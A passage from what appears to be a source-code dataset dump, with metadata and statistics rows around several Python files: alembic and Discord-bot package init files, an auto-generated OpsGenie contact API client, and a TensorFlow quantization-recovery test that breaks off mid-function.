| 30.5 | 45 | 0.874317 | 24 | 183 | 6.291667 | 0.375 | 0.430464 | 0.251656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10929 | 183 | 5 | 46 | 36.6 | 0.92638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f009da930b3b0287dc0e71e2fc799cd642d7160e | 1,065 | py | Python | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 25 | 2020-10-03T07:18:44.000Z | 2022-03-24T06:22:19.000Z | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 33 | 2020-04-14T22:09:04.000Z | 2021-01-10T02:58:49.000Z | env/lib/python3.6/site-packages/alembic/testing/__init__.py | amogh-gulati/corona_dashboard | ce1a20ad56bdfb758d41513b4706fe3a47764c32 | [
"MIT"
] | 20 | 2020-10-03T09:49:24.000Z | 2021-11-25T08:48:30.000Z | from sqlalchemy.testing import config # noqa
from sqlalchemy.testing import emits_warning # noqa
from sqlalchemy.testing import engines # noqa
from sqlalchemy.testing import mock # noqa
from sqlalchemy.testing import provide_metadata # noqa
from sqlalchemy.testing import uses_deprecated # noqa
from sqlalchemy.testing.config import requirements as requires # noqa
from alembic import util # noqa
from . import exclusions # noqa
from .assertions import assert_raises # noqa
from .assertions import assert_raises_message # noqa
from .assertions import emits_python_deprecation_warning # noqa
from .assertions import eq_ # noqa
from .assertions import eq_ignore_whitespace # noqa
from .assertions import is_ # noqa
from .assertions import is_false # noqa
from .assertions import is_not_ # noqa
from .assertions import is_true # noqa
from .assertions import ne_ # noqa
from .fixture_functions import combinations # noqa
from .fixture_functions import fixture # noqa
from .fixtures import TestBase # noqa
from .util import resolve_lambda # noqa
| 42.6 | 70 | 0.802817 | 141 | 1,065 | 5.914894 | 0.29078 | 0.211031 | 0.215827 | 0.28777 | 0.531175 | 0.086331 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153991 | 1,065 | 24 | 71 | 44.375 | 0.925638 | 0.107042 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.434783 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f016c53efb4cd76a9653aa250160f22268f54137 | 135 | py | Python | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | cogs/__init__.py | Shlol762/CauveryBot | e7ca4a289f6c661e53133249b630a64a81a7a9d7 | [
"MIT"
] | null | null | null | from utils import *
from discord import *
from discord.ext.commands import *
from discord.ext.tasks import *
from discord.ui import *
| 19.285714 | 34 | 0.77037 | 20 | 135 | 5.2 | 0.4 | 0.384615 | 0.653846 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 135 | 6 | 35 | 22.5 | 0.912281 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
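`cogs/__init__.py` above re-exports everything through wildcard imports. Which names `from module import *` actually copies is governed by the source module's `__all__` when it defines one; a self-contained sketch using a synthetic module (the name `demo_mod` is made up for illustration):

```python
import sys
import types

# Build a throwaway module with one exported and one unexported name.
mod = types.ModuleType("demo_mod")
exec("__all__ = ['public']\npublic = 1\n_private = 2", mod.__dict__)
sys.modules["demo_mod"] = mod

# Emulate `from demo_mod import *` into a fresh namespace.
ns = {}
exec("from demo_mod import *", ns)
```

Only `public` lands in `ns`; `_private` stays behind because it is absent from `__all__`.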
f05ce34276d0fb58f6cf294690b53bad4f04eeab | 30,254 | py | Python | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | null | null | null | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | null | null | null | opsgenie_swagger/api/contact_api.py | Logicworks/opsgenie-python-sdk | 244c4c40ddcc25e70df5ba4425ab8d7c8da59c18 | [
"Apache-2.0"
] | 1 | 2020-11-07T11:27:13.000Z | 2020-11-07T11:27:13.000Z | # coding: utf-8
"""
OpsGenie REST API
OpsGenie OpenAPI Specification # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opsgenie_swagger.api_client import ApiClient
class ContactApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_contact(self, identifier, **kwargs): # noqa: E501
"""Create Contact # noqa: E501
Creates a new contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param CreateContactPayload body: Request payload of creating contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_contact_with_http_info(identifier, **kwargs) # noqa: E501
else:
(data) = self.create_contact_with_http_info(identifier, **kwargs) # noqa: E501
return data
def create_contact_with_http_info(self, identifier, **kwargs): # noqa: E501
"""Create Contact # noqa: E501
Creates a new contact # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_contact_with_http_info(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param CreateContactPayload body: Request payload of creating contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `create_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Delete Contact # noqa: E501
Delete contact using contact id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.delete_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def delete_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Delete Contact # noqa: E501
Delete contact using contact id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `delete_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `delete_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disable_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Disable Contact # noqa: E501
Disable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.disable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.disable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def disable_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Disable Contact # noqa: E501
Disable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disable_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `disable_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `disable_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Enable Contact # noqa: E501
Enable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.enable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.enable_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def enable_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Enable Contact # noqa: E501
Enable the contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `enable_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `enable_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Get Contact # noqa: E501
Returns contact with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: GetContactResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.get_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def get_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Get Contact # noqa: E501
Returns contact with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:return: GetContactResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `get_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `get_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetContactResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_contacts(self, identifier, **kwargs): # noqa: E501
"""List Contacts # noqa: E501
Returns list of contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_contacts(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:return: ListContactsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_contacts_with_http_info(identifier, **kwargs) # noqa: E501
else:
(data) = self.list_contacts_with_http_info(identifier, **kwargs) # noqa: E501
return data
def list_contacts_with_http_info(self, identifier, **kwargs): # noqa: E501
"""List Contacts # noqa: E501
Returns list of contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_contacts_with_http_info(identifier, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:return: ListContactsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_contacts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `list_contacts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListContactsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_contact(self, identifier, contact_id, **kwargs): # noqa: E501
"""Update Contact (Partial) # noqa: E501
Update contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_contact(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:param UpdateContactPayload body: Request payload of update contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
else:
(data) = self.update_contact_with_http_info(identifier, contact_id, **kwargs) # noqa: E501
return data
def update_contact_with_http_info(self, identifier, contact_id, **kwargs): # noqa: E501
"""Update Contact (Partial) # noqa: E501
Update contact of the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_contact_with_http_info(identifier, contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str identifier: Identifier of the user to be searched (required)
:param str contact_id: Id of the contact (required)
:param UpdateContactPayload body: Request payload of update contact action
:return: SuccessResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['identifier', 'contact_id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_contact" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'identifier' is set
if ('identifier' not in params or
params['identifier'] is None):
raise ValueError("Missing the required parameter `identifier` when calling `update_contact`") # noqa: E501
# verify the required parameter 'contact_id' is set
if ('contact_id' not in params or
params['contact_id'] is None):
raise ValueError("Missing the required parameter `contact_id` when calling `update_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'identifier' in params:
path_params['identifier'] = params['identifier'] # noqa: E501
if 'contact_id' in params:
path_params['contactId'] = params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['GenieKey'] # noqa: E501
return self.api_client.call_api(
'/v2/users/{identifier}/contacts/{contactId}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.446524 | 120 | 0.615026 | 3,414 | 30,254 | 5.22935 | 0.050381 | 0.048843 | 0.037249 | 0.028231 | 0.966224 | 0.963648 | 0.960119 | 0.955862 | 0.952557 | 0.952557 | 0 | 0.016124 | 0.296886 | 30,254 | 747 | 121 | 40.500669 | 0.823148 | 0.332452 | 0 | 0.813433 | 1 | 0 | 0.208553 | 0.040507 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037313 | false | 0 | 0.00995 | 0 | 0.10199 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
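Every `*_with_http_info` method in the generated client above repeats the same loop that rejects unexpected keyword arguments against an `all_params` whitelist. The core of that pattern as a standalone helper (the name `_check_kwargs` is ours, not part of the generated client):

```python
def _check_kwargs(method_name, all_params, kwargs):
    """Raise TypeError for any keyword argument not in all_params,
    mirroring the validation loop in the generated methods."""
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name))


# Known parameters pass silently.
_check_kwargs("get_contact", ["identifier", "contact_id"], {"identifier": "u1"})

# Unknown parameters raise, just like the generated client.
try:
    _check_kwargs("get_contact", ["identifier"], {"bogus": 1})
    error_message = None
except TypeError as exc:
    error_message = str(exc)
```

Centralizing the check like this would remove dozens of duplicated loops, at the cost of diverging from what the swagger codegen templates emit.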
# test/test_tensorflow_recover.py (huggingface/neural-compressor, Apache-2.0)
#
# -*- coding: utf-8 -*-
#
import shutil
import unittest
import os
import yaml
import tensorflow as tf
from tensorflow.python.platform import gfile
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import tensor_util
from neural_compressor.adaptor.tf_utils.util import disable_random
def build_fake_yaml():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
evaluation:
accuracy:
metric:
topk: 1
tuning:
accuracy_criterion:
relative: 0.0001
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
def build_fake_yaml_2():
fake_yaml = '''
model:
name: fake_yaml
framework: tensorflow
inputs: input
outputs: op_to_store
device: cpu
graph_optimization:
precisions: [bf16]
evaluation:
accuracy:
metric:
topk: 1
tuning:
accuracy_criterion:
relative: 0.0001
workspace:
path: saved
'''
y = yaml.load(fake_yaml, Loader=yaml.SafeLoader)
with open('fake_yaml_2.yaml', "w", encoding="utf-8") as f:
yaml.dump(y, f)
class TestTensorflowRecover(unittest.TestCase):
@classmethod
def setUpClass(cls):
build_fake_yaml()
@classmethod
def tearDownClass(cls):
os.remove('fake_yaml.yaml')
os.remove('test.pb')
shutil.rmtree('./saved', ignore_errors=True)
@disable_random()
def test_tensorflow_recover(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
paddings = tf.constant([[0, 0], [1, 1], [1, 1], [0, 0]])
x_pad = tf.pad(top_relu, paddings, "CONSTANT")
conv_weights = tf.compat.v1.get_variable("weight", [3, 3, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv_weights_2 = tf.compat.v1.get_variable("weight_2", [3, 8, 16, 16],
initializer=tf.compat.v1.random_normal_initializer())
conv = tf.nn.conv2d(x_pad, conv_weights, strides=[1, 2, 2, 1], padding="VALID")
relu = tf.nn.relu(conv)
max_pool = tf.nn.max_pool(relu, ksize=1, strides=[1, 2, 2, 1], padding="SAME")
conv_bias = tf.compat.v1.get_variable("bias", [16],
initializer=tf.compat.v1.random_normal_initializer())
conv_1 = tf.nn.conv2d(max_pool, conv_weights_2, strides=[
1, 2, 2, 1], padding="VALID", name='conv1_3')
conv_bias = tf.math.add(conv_1, conv_bias)
relu6 = tf.nn.relu6(conv_bias, name='op_to_store')
out_name = relu6.name.split(':')[0]
with tf.compat.v1.Session() as sess:
sess.run(tf.compat.v1.global_variables_initializer())
constant_graph = graph_util.convert_variables_to_constants(
sess=sess,
input_graph_def=sess.graph_def,
output_node_names=[out_name])
with gfile.GFile('./test.pb', "wb") as f:
f.write(constant_graph.SerializeToString())
from neural_compressor.experimental import Quantization, common
quantizer = Quantization("./fake_yaml.yaml")
dataset = quantizer.dataset('dummy', shape=(100, 56, 56, 16), label=True)
quantizer.calib_dataloader = common.DataLoader(dataset)
quantizer.model = constant_graph
q_model = quantizer.fit()
from neural_compressor.utils.utility import recover
recover_model = recover('./test.pb', './saved/history.snapshot', 0)
q_model_const_value = {}
for node in q_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if not tensor_value.shape:
q_model_const_value[node.name] = tensor_value
for node in recover_model.graph_def.node:
if node.op == "Const":
tensor_value = tensor_util.MakeNdarray(node.attr["value"].tensor)
if node.name in q_model_const_value:
self.assertEqual(tensor_value, q_model_const_value[node.name])
class TestTensorflowRecoverForceBF16(unittest.TestCase):
@classmethod
def setUpClass(cls):
os.environ['FORCE_BF16'] = '1'
build_fake_yaml_2()
@classmethod
def tearDownClass(cls):
del os.environ['FORCE_BF16']
os.remove('fake_yaml_2.yaml')
os.remove('test.pb')
shutil.rmtree('./saved', ignore_errors=True)
@disable_random()
def test_tensorflow_recover_bf16(self):
x = tf.compat.v1.placeholder(tf.float32, [1, 56, 56, 16], name="input")
top_relu = tf.nn.relu(x)
